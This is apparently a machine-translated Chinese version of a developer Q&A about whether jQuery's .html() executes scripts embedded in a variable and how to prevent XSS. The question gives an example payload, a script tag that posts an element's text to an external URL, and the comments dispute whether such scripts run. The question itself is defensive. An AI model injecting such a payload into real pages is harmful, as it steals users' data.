可能重複:
html() vs innerHTML jquery/javascript & XSS attacks是jQuery.html()危險嗎?
是jQuery.html()危險嗎?
$("#id").html("<span>"+ variable + "</span>");
就像上面的例子中,如果變量將具有以下值:
"<script> $.post("external_url.php", {sesitivedata= $("#someElement").text()}, function() {}) </script>"
請問腳本來執行?如果有,有什麼辦法讓變量包含正常的html標籤,但不包含腳本?
編輯:添加腳本標記字符串
你試過了嗎?發生了什麼? – epascarello 2012-08-17 16:51:24
'$ .html()'不執行'eval'。 'eval'是觸發腳本執行所必需的。 – Ohgodwhy 2012-08-17 16:51:54
@Ohgodwhy你是錯的。這很容易測試。打開你的開發者控制檯並執行'$('body div:last')。html($(「」));' – meagar 2012-08-17 17:01:50